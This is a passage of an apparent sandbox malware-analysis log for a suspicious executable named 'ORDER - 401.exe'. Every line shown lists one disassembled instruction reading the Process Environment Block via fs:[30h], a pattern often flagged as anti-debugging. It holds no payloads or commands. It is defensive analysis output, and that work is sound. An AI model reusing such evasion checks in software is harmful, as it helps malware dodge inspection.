                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A62A0 mov ecx, dword ptr fs:[00000030h]5_2_010A62A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A62A0 mov eax, dword ptr fs:[00000030h]5_2_010A62A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A62A0 mov eax, dword ptr fs:[00000030h]5_2_010A62A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A62A0 mov eax, dword ptr fs:[00000030h]5_2_010A62A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A62A0 mov eax, dword ptr fs:[00000030h]5_2_010A62A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A2C3 mov eax, dword ptr fs:[00000030h]5_2_0101A2C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A2C3 mov eax, dword ptr fs:[00000030h]5_2_0101A2C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A2C3 mov eax, dword ptr fs:[00000030h]5_2_0101A2C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A2C3 mov eax, dword ptr fs:[00000030h]5_2_0101A2C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A2C3 mov eax, dword ptr fs:[00000030h]5_2_0101A2C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010202E1 mov eax, dword ptr fs:[00000030h]5_2_010202E1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010202E1 mov eax, dword ptr fs:[00000030h]5_2_010202E1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010202E1 mov eax, dword ptr fs:[00000030h]5_2_010202E1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6500 mov eax, dword ptr fs:[00000030h]5_2_010A6500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4500 mov eax, dword ptr fs:[00000030h]5_2_010E4500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4500 mov eax, dword ptr fs:[00000030h]5_2_010E4500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4500 mov eax, dword ptr fs:[00000030h]5_2_010E4500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4500 mov eax, dword ptr fs:[00000030h]5_2_010E4500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4500 mov eax, dword ptr fs:[00000030h]5_2_010E4500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4500 mov eax, dword ptr fs:[00000030h]5_2_010E4500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E4500 mov eax, dword ptr fs:[00000030h]5_2_010E4500
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020535 mov eax, dword ptr fs:[00000030h]5_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020535 mov eax, dword ptr fs:[00000030h]5_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020535 mov eax, dword ptr fs:[00000030h]5_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020535 mov eax, dword ptr fs:[00000030h]5_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020535 mov eax, dword ptr fs:[00000030h]5_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020535 mov eax, dword ptr fs:[00000030h]5_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E53E mov eax, dword ptr fs:[00000030h]5_2_0103E53E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E53E mov eax, dword ptr fs:[00000030h]5_2_0103E53E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E53E mov eax, dword ptr fs:[00000030h]5_2_0103E53E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E53E mov eax, dword ptr fs:[00000030h]5_2_0103E53E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E53E mov eax, dword ptr fs:[00000030h]5_2_0103E53E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018550 mov eax, dword ptr fs:[00000030h]5_2_01018550
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018550 mov eax, dword ptr fs:[00000030h]5_2_01018550
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104656A mov eax, dword ptr fs:[00000030h]5_2_0104656A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104656A mov eax, dword ptr fs:[00000030h]5_2_0104656A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104656A mov eax, dword ptr fs:[00000030h]5_2_0104656A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01012582 mov eax, dword ptr fs:[00000030h]5_2_01012582
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01012582 mov ecx, dword ptr fs:[00000030h]5_2_01012582
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01044588 mov eax, dword ptr fs:[00000030h]5_2_01044588
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E59C mov eax, dword ptr fs:[00000030h]5_2_0104E59C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010905A7 mov eax, dword ptr fs:[00000030h]5_2_010905A7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010905A7 mov eax, dword ptr fs:[00000030h]5_2_010905A7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010905A7 mov eax, dword ptr fs:[00000030h]5_2_010905A7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010345B1 mov eax, dword ptr fs:[00000030h]5_2_010345B1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010345B1 mov eax, dword ptr fs:[00000030h]5_2_010345B1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E5CF mov eax, dword ptr fs:[00000030h]5_2_0104E5CF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E5CF mov eax, dword ptr fs:[00000030h]5_2_0104E5CF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010165D0 mov eax, dword ptr fs:[00000030h]5_2_010165D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A5D0 mov eax, dword ptr fs:[00000030h]5_2_0104A5D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A5D0 mov eax, dword ptr fs:[00000030h]5_2_0104A5D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010125E0 mov eax, dword ptr fs:[00000030h]5_2_010125E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103E5E7 mov eax, dword ptr fs:[00000030h]5_2_0103E5E7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C5ED mov eax, dword ptr fs:[00000030h]5_2_0104C5ED
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C5ED mov eax, dword ptr fs:[00000030h]5_2_0104C5ED
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01048402 mov eax, dword ptr fs:[00000030h]5_2_01048402
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01048402 mov eax, dword ptr fs:[00000030h]5_2_01048402
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01048402 mov eax, dword ptr fs:[00000030h]5_2_01048402
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100E420 mov eax, dword ptr fs:[00000030h]5_2_0100E420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100E420 mov eax, dword ptr fs:[00000030h]5_2_0100E420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100E420 mov eax, dword ptr fs:[00000030h]5_2_0100E420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100C427 mov eax, dword ptr fs:[00000030h]5_2_0100C427
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096420 mov eax, dword ptr fs:[00000030h]5_2_01096420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096420 mov eax, dword ptr fs:[00000030h]5_2_01096420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096420 mov eax, dword ptr fs:[00000030h]5_2_01096420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096420 mov eax, dword ptr fs:[00000030h]5_2_01096420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096420 mov eax, dword ptr fs:[00000030h]5_2_01096420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096420 mov eax, dword ptr fs:[00000030h]5_2_01096420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096420 mov eax, dword ptr fs:[00000030h]5_2_01096420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A430 mov eax, dword ptr fs:[00000030h]5_2_0104A430
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E443 mov eax, dword ptr fs:[00000030h]5_2_0104E443
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103245A mov eax, dword ptr fs:[00000030h]5_2_0103245A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CA456 mov eax, dword ptr fs:[00000030h]5_2_010CA456
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100645D mov eax, dword ptr fs:[00000030h]5_2_0100645D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109C460 mov ecx, dword ptr fs:[00000030h]5_2_0109C460
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103A470 mov eax, dword ptr fs:[00000030h]5_2_0103A470
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103A470 mov eax, dword ptr fs:[00000030h]5_2_0103A470
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103A470 mov eax, dword ptr fs:[00000030h]5_2_0103A470
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CA49A mov eax, dword ptr fs:[00000030h]5_2_010CA49A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010164AB mov eax, dword ptr fs:[00000030h]5_2_010164AB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010444B0 mov ecx, dword ptr fs:[00000030h]5_2_010444B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109A4B0 mov eax, dword ptr fs:[00000030h]5_2_0109A4B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010104E5 mov ecx, dword ptr fs:[00000030h]5_2_010104E5
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C700 mov eax, dword ptr fs:[00000030h]5_2_0104C700
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010710 mov eax, dword ptr fs:[00000030h]5_2_01010710
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01040710 mov eax, dword ptr fs:[00000030h]5_2_01040710
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C720 mov eax, dword ptr fs:[00000030h]5_2_0104C720
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C720 mov eax, dword ptr fs:[00000030h]5_2_0104C720
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104273C mov eax, dword ptr fs:[00000030h]5_2_0104273C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104273C mov ecx, dword ptr fs:[00000030h]5_2_0104273C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104273C mov eax, dword ptr fs:[00000030h]5_2_0104273C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108C730 mov eax, dword ptr fs:[00000030h]5_2_0108C730
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104674D mov esi, dword ptr fs:[00000030h]5_2_0104674D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104674D mov eax, dword ptr fs:[00000030h]5_2_0104674D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104674D mov eax, dword ptr fs:[00000030h]5_2_0104674D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010750 mov eax, dword ptr fs:[00000030h]5_2_01010750
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E75D mov eax, dword ptr fs:[00000030h]5_2_0109E75D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052750 mov eax, dword ptr fs:[00000030h]5_2_01052750
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052750 mov eax, dword ptr fs:[00000030h]5_2_01052750
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01094755 mov eax, dword ptr fs:[00000030h]5_2_01094755
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01018770 mov eax, dword ptr fs:[00000030h]5_2_01018770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020770 mov eax, dword ptr fs:[00000030h]5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B678E mov eax, dword ptr fs:[00000030h]5_2_010B678E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C47A0 mov eax, dword ptr fs:[00000030h]5_2_010C47A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010107AF mov eax, dword ptr fs:[00000030h]5_2_010107AF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101C7C0 mov eax, dword ptr fs:[00000030h]5_2_0101C7C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010907C3 mov eax, dword ptr fs:[00000030h]5_2_010907C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E7E1 mov eax, dword ptr fs:[00000030h]5_2_0109E7E1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010327ED mov eax, dword ptr fs:[00000030h]5_2_010327ED
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010327ED mov eax, dword ptr fs:[00000030h]5_2_010327ED
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010327ED mov eax, dword ptr fs:[00000030h]5_2_010327ED
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010147FB mov eax, dword ptr fs:[00000030h]5_2_010147FB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010147FB mov eax, dword ptr fs:[00000030h]5_2_010147FB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E609 mov eax, dword ptr fs:[00000030h]5_2_0108E609
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102260B mov eax, dword ptr fs:[00000030h]5_2_0102260B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102260B mov eax, dword ptr fs:[00000030h]5_2_0102260B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102260B mov eax, dword ptr fs:[00000030h]5_2_0102260B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102260B mov eax, dword ptr fs:[00000030h]5_2_0102260B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102260B mov eax, dword ptr fs:[00000030h]5_2_0102260B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102260B mov eax, dword ptr fs:[00000030h]5_2_0102260B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102260B mov eax, dword ptr fs:[00000030h]5_2_0102260B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052619 mov eax, dword ptr fs:[00000030h]5_2_01052619
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01046620 mov eax, dword ptr fs:[00000030h]5_2_01046620
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01048620 mov eax, dword ptr fs:[00000030h]5_2_01048620
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E627 mov eax, dword ptr fs:[00000030h]5_2_0102E627
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101262C mov eax, dword ptr fs:[00000030h]5_2_0101262C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102C640 mov eax, dword ptr fs:[00000030h]5_2_0102C640
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D866E mov eax, dword ptr fs:[00000030h]5_2_010D866E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D866E mov eax, dword ptr fs:[00000030h]5_2_010D866E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A660 mov eax, dword ptr fs:[00000030h]5_2_0104A660
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A660 mov eax, dword ptr fs:[00000030h]5_2_0104A660
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01042674 mov eax, dword ptr fs:[00000030h]5_2_01042674
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014690 mov eax, dword ptr fs:[00000030h]5_2_01014690
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014690 mov eax, dword ptr fs:[00000030h]5_2_01014690
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104C6A6 mov eax, dword ptr fs:[00000030h]5_2_0104C6A6
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010466B0 mov eax, dword ptr fs:[00000030h]5_2_010466B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0104A6C7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A6C7 mov eax, dword ptr fs:[00000030h]5_2_0104A6C7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010906F1 mov eax, dword ptr fs:[00000030h]5_2_010906F1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010906F1 mov eax, dword ptr fs:[00000030h]5_2_010906F1
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E6F2 mov eax, dword ptr fs:[00000030h]5_2_0108E6F2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E6F2 mov eax, dword ptr fs:[00000030h]5_2_0108E6F2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E6F2 mov eax, dword ptr fs:[00000030h]5_2_0108E6F2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E6F2 mov eax, dword ptr fs:[00000030h]5_2_0108E6F2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E908 mov eax, dword ptr fs:[00000030h]5_2_0108E908
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E908 mov eax, dword ptr fs:[00000030h]5_2_0108E908
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01008918 mov eax, dword ptr fs:[00000030h]5_2_01008918
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01008918 mov eax, dword ptr fs:[00000030h]5_2_01008918
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109C912 mov eax, dword ptr fs:[00000030h]5_2_0109C912
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A892B mov eax, dword ptr fs:[00000030h]5_2_010A892B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109892A mov eax, dword ptr fs:[00000030h]5_2_0109892A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01090946 mov eax, dword ptr fs:[00000030h]5_2_01090946
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01036962 mov eax, dword ptr fs:[00000030h]5_2_01036962
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01036962 mov eax, dword ptr fs:[00000030h]5_2_01036962
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01036962 mov eax, dword ptr fs:[00000030h]5_2_01036962
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105096E mov eax, dword ptr fs:[00000030h]5_2_0105096E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105096E mov edx, dword ptr fs:[00000030h]5_2_0105096E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105096E mov eax, dword ptr fs:[00000030h]5_2_0105096E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B4978 mov eax, dword ptr fs:[00000030h]5_2_010B4978
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B4978 mov eax, dword ptr fs:[00000030h]5_2_010B4978
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109C97C mov eax, dword ptr fs:[00000030h]5_2_0109C97C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A0 mov eax, dword ptr fs:[00000030h]5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010109AD mov eax, dword ptr fs:[00000030h]5_2_010109AD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010109AD mov eax, dword ptr fs:[00000030h]5_2_010109AD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010989B3 mov esi, dword ptr fs:[00000030h]5_2_010989B3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010989B3 mov eax, dword ptr fs:[00000030h]5_2_010989B3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010989B3 mov eax, dword ptr fs:[00000030h]5_2_010989B3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A69C0 mov eax, dword ptr fs:[00000030h]5_2_010A69C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A9D0 mov eax, dword ptr fs:[00000030h]5_2_0101A9D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010449D0 mov eax, dword ptr fs:[00000030h]5_2_010449D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DA9D3 mov eax, dword ptr fs:[00000030h]5_2_010DA9D3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109E9E0 mov eax, dword ptr fs:[00000030h]5_2_0109E9E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010429F9 mov eax, dword ptr fs:[00000030h]5_2_010429F9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010429F9 mov eax, dword ptr fs:[00000030h]5_2_010429F9
